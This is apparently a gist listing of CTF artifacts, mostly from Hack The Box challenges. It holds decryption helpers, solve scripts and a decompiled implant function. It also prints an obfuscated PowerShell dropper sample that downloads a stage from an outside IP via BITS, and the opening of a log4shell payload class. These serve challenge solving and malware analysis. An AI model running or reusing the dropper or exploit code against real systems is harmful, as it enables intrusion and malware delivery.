
@khr0x40sh
khr0x40sh / ImplantCore.cs
Created March 23, 2023 18:22
HTB:CA2023 Forensics Interstellar Implant Core C2 Function
// Program
// Token: 0x06000017 RID: 23 RVA: 0x00002CDC File Offset: 0x00000EDC
private static void ImplantCore(string baseURL, string RandomURI, string stringURLS, string KillDate, string Sleep, string Key, string stringIMGS, string Jitter)
{
Program.UrlGen.Init(stringURLS, RandomURI, baseURL);
Program.ImgGen.Init(stringIMGS);
Program.pKey = Key;
int num = 5;
Regex regex = new Regex("(?<t>[0-9]{1,9})(?<u>[h,m,s]{0,1})", RegexOptions.IgnoreCase | RegexOptions.Compiled);
Match match = regex.Match(Sleep);
@khr0x40sh
khr0x40sh / decrypt_phase2.py
Created March 23, 2023 18:13
HTB:CA2023 Forensics Interstellar python decrypt for phase 2
import base64
from Crypto.Cipher import AES
### borrowed from https://gist.github.com/lopes/168c9d74b988391e702aac5f4aa69e41
def decrypt(data, key):
    """Decrypt an AES-CBC blob whose first block carries the IV.

    data -- IV (AES.block_size bytes) followed by the ciphertext.
    key  -- AES key passed straight to AES.new().

    Returns the raw decrypted bytes. Padding is NOT stripped and CBC gives
    no integrity protection, so the result must be treated as untrusted
    bytes when it comes from captured traffic.
    """
    iv_len = AES.block_size
    iv, ciphertext = data[:iv_len], data[iv_len:]
    return AES.new(key, AES.MODE_CBC, iv).decrypt(ciphertext)
# Hard-coded key for this challenge sample; the base64 string decodes to 32 bytes (AES-256).
# NOTE(review): presumably recovered from the implant during analysis — confirm against the write-up.
key = base64.b64decode("DGCzi057IDmHvgTVE2gm60w8quqfpMD+o8qCBGpYItc=")
@khr0x40sh
khr0x40sh / decrypt_phase1.py
Created March 23, 2023 17:56
HTB:CA2023 Forensics Interstellar python decrypt for phase 1
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad, unpad
### borrowed from https://gist.github.com/lopes/168c9d74b988391e702aac5f4aa69e41
def decrypt(data, key, iv):
    """Decrypt an AES-CBC ciphertext with an explicit IV and strip its padding.

    data -- ciphertext only (the IV is supplied separately).
    key  -- AES key passed to AES.new().
    iv   -- initialisation vector passed to AES.new().

    Returns the plaintext after unpad() has removed the padding. unpad()
    raises ValueError on malformed padding, which is the only sanity
    check here: CBC itself does not authenticate the data.
    """
    aes = AES.new(key, AES.MODE_CBC, iv)
    padded_plaintext = aes.decrypt(data[:])
    return unpad(padded_plaintext, AES.block_size)
# Static key and IV for phase 1, each written as a list of 16 integers (0 or 1).
# NOTE(review): PyCryptodome's AES.new() expects bytes-like values, so these lists need a
# bytes(...) conversion before use; that step is not visible in this excerpt — confirm.
key = [0,1,1,0,0,1,1,0,0,1,1,0,1,1,0,0]
iv = [0,1,1,0,0,0,0,1,0,1,1,0,0,1,1,1]
@khr0x40sh
khr0x40sh / vn84.ps1
Last active March 23, 2023 17:55
HTB:CA2023 Forensics Interstellar C2 challenge - PS dropper
#Sample ps1 dropper from HTB:CA2023 Forensics Interstellar C2 challenge. DO NOT EXECUTE! USE OF THIS IS AT YOUR OWN RISK!
# Analyst notes (static reading only, nothing here was executed):
# Every cmdlet and type name is rebuilt at run time with the -f format operator, string
# concatenation, mixed case and backtick escapes, so plain string matching on the script
# text will not find them. The next line resolves to:
#   Set-Item Variable:qLz0so  -> [System.IO.FileMode]
#   Set-Variable l60Yu3       -> [System.Security.Cryptography.Aes]
#   Set-Variable BI34         -> [System.Security.Cryptography.CryptoStreamMode]
#   $URL = hxxp://64.226.84[.]200/94974f08-5853-41ab-938a-ae1bd86d8e51   (defanged)
.("{1}{0}{2}" -f'T','Set-i','em') ('vAriA'+'ble'+':q'+'L'+'z0so') ( [tYpe]("{0}{1}{2}{3}" -F'SySTEM.i','o.Fi','lE','mode')) ; &("{0}{2}{1}" -f'set-Vari','E','ABL') l60Yu3 ( [tYPe]("{7}{0}{5}{4}{3}{1}{2}{6}"-F'm.','ph','Y.ae','A','TY.crypTOgR','SeCuRi','S','sYSte')); .("{0}{2}{1}{3}" -f 'Set-V','i','AR','aBle') BI34 ( [TyPE]("{4}{7}{0}{1}{3}{2}{8}{5}{10}{6}{9}" -f 'TEm.secU','R','Y.CrY','IT','s','Y.','D','yS','pTogrAPH','E','CrypTOSTReAmmo')); ${U`Rl} = ("{0}{4}{1}{5}{8}{6}{2}{7}{9}{3}"-f 'htt','4f0','53-41ab-938','d8e51','p://64.226.84.200/9497','8','58','a-ae1bd8','-','6')
# $PTF: local destination in the user's temp directory, named with the same GUID as the URL path.
${P`TF} = "$env:temp\94974f08-5853-41ab-938a-ae1bd86d8e51"
# Resolves to: Import-Module BitsTransfer
.("{2}{1}{3}{0}"-f'ule','M','Import-','od') ("{2}{0}{3}{1}"-f 'r','fer','BitsT','ans')
# Resolves to: Start-BitsTransfer -Source $URL -Destination $PTF
# The stage is fetched as a BITS job, so the transfer appears in the BITS client operational
# log, and PowerShell module logging records the resolved cmdlet names despite the obfuscation.
.("{4}{5}{3}{1}{2}{0}"-f'r','-BitsT','ransfe','t','S','tar') -Source ${u`Rl} -Destination ${p`Tf}
${Fs} = &("{1}{0}{2}" -f 'w-Ob','Ne','ject') ("{1}{2}{0}"-f 'eam','
@khr0x40sh
khr0x40sh / solve.ps1
Created February 2, 2023 16:33
Solution for pwnme in Powershell
# ASCII encoder object; where it is used lies in the part of the script not shown here.
$encoding = New-Object System.Text.AsciiEncoding
# Open a TCP connection to the challenge service (host and port as given by the author).
[System.Net.Sockets.TcpClient] $tcpClient = [System.Net.Sockets.TcpClient]::new("pwnme.maveris.fun", "8888")
$tcpStream = $tcpClient.GetStream()
# Wrap the network stream in binary reader/writer helpers for raw byte I/O.
[System.IO.BinaryReader] $reader = [System.IO.BinaryReader]::new($tcpStream)
[System.IO.BinaryWriter] $writer = [System.IO.BinaryWriter]::new($tcpStream)
# State flags and a result accumulator; how they are updated is not visible in this excerpt.
# NOTE(review): client, reader and writer are disposable — confirm the full script closes them.
$cli = $false
$auth = $false
$res = @()
@khr0x40sh
khr0x40sh / whole_lotta_candy_encrypt.py
Created October 28, 2022 12:53
HTB HackTheBoo whole lotta candy Encryptor class
from Crypto.Util.Padding import pad
from Crypto.Util import Counter
from Crypto.Cipher import AES
import os
class Encryptor:
def __init__(self):
self.key = os.urandom(16)
@khr0x40sh
khr0x40sh / whole_lotta_candy_server.py
Created October 28, 2022 12:48
HTB HackTheBoo whole lotta candy server code
from encrypt import Encryptor
from secret import FLAG
import socketserver
import random
import signal
import json
# Names of the block-cipher modes known to the challenge server.
# NOTE(review): the sample output on this page shows "Selected mode is ECB.", so one entry is
# presumably picked per session — the selection code is not visible here.
MODES = ['ECB', 'CBC', 'CFB', 'OFB', 'CTR']
@khr0x40sh
khr0x40sh / whole_lotta_candy_solve.py
Last active October 28, 2022 12:59
HTB HacktheBoo whole lotta candy solve script
from pwn import *
import json
import binascii
# Target is a challenge server instance on the loopback interface.
ip = '127.0.0.1'
port = 1337
# remote() comes from the wildcard pwn import above and opens the TCP connection.
r = remote(ip, port)
while True:
@khr0x40sh
khr0x40sh / whole_lotta_candy_output.txt
Created October 28, 2022 12:42
HTB HacktheBoo whole lotta candy solve output
crypto_whole_lotta_candy/solve.py
[x] Opening connection to 127.0.0.1 on port 1337
[x] Opening connection to 127.0.0.1 on port 1337: Trying 127.0.0.1
[+] Opening connection to 127.0.0.1 on port 1337: Done
Please interact with the server using json data!
Selected mode is ECB.
Options:
1.Encrypt flag
@khr0x40sh
khr0x40sh / YuleLogExploit.java
Created July 29, 2022 12:08
log4shell payload for UnlockTheCity
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.Socket;
public class YuleLogExploit {
public YuleLogExploit() throws Exception {
String cmd;